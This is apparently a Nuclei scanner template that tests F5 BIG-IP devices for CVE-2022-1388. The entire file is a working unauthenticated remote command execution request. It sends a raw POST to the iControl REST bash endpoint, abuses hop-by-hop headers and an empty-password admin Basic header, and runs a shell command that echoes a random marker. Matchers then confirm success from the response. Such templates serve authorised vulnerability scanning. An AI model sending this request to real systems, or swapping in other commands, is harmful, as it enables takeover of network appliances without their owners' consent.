id: bigip-icontrol-rest-rce

info:
  name: F5 BIG-IP iControl REST Panel RCE
  author: twitter.com/numanturle
  severity: critical
  tags: CVE-2022-1388

requests:
  - raw:
      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: localhost
        Connection: keep-alive, X-F5-Auth-Token
        Authorization: Basic YWRtaW46
        X-F5-Auth-Token: rrr
        X-Forwarded-For: localhost
        Referer: localhost
        Content-Length: 39

        {"command":"run","utilCmdArgs":"-c echo {{randstr}}"}

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "{{randstr}}"
        part: body
        condition: and

      - type: status
        status:
          - 200